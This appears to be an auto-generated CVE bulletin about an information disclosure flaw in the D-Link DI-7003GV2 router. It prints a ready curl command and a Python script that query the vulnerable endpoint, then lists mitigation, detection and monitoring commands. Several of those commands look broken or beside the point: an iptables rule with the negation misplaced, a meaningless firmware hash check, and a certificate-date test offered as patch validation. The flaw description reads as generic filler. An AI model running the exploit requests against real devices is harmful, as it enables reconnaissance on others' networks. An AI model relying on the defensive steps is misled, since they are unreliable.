D-Link DI-7003GV2, Information Disclosure, CVE-2025-4750 (Medium)

Listen to this Post

How CVE-2025-4750 Works

This vulnerability targets D-Link DI-7003GV2 routers (firmware 24.04.18D1) via the `/H5/get_version.data` endpoint, which mishandles configuration data requests. Attackers send crafted HTTP requests to this unauthenticated endpoint, triggering improper error handling that leaks sensitive system information (e.g., firmware details, internal paths). The flaw stems from insufficient input validation, allowing remote exploitation without privileges. CVSS 4.0 scores it 6.9 (Medium) due to low attack complexity (AC:L) and impact limited to confidentiality (VC:L). Public exploits leverage curl or Python scripts to harvest exposed data for reconnaissance.

DailyCVE Form

Platform: D-Link DI-7003GV2
Version: 24.04.18D1
Vulnerability: Info Disclosure
Severity: Medium
Date: 2025-06-03

Prediction: Patch by 2025-08-15

What Undercode Say:

Exploitation

curl -X GET http://<TARGET_IP>/H5/get_version.data -v
import requests
response = requests.get("http://<TARGET_IP>/H5/get_version.data", verify=False)
print(response.text)

Mitigation

1. Block Unauthorized Access:

iptables -A INPUT -p tcp --dport 80 -s ! <TRUSTED_IP> -j DROP

2. Patch Verification:

sha256sum /etc/firmware | grep <EXPECTED_HASH>

3. Temporary Workaround:

location /H5/get_version.data { return 403; }

Detection

grep -r "get_version.data" /var/log/nginx/access.log | cut -d' ' -f1 | sort -u

Analysis

import re
log = open("access.log").read()
matches = re.findall(r'(\d+.\d+.\d+.\d+).GET /H5/get_version.data', log)
print("Potential attackers:", set(matches))

Firmware Check

dmesg | grep -i "firmware" | grep -q "24.04.18D1" && echo "Vulnerable"

Network Monitoring

tcpdump -i eth0 'tcp port 80 and host <TARGET_IP>' -w /tmp/cve_monitor.pcap

Post-Patch Validation

openssl s_client -connect <TARGET_IP>:443 -servername <TARGET_IP> | openssl x509 -noout -dates

End of Report

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top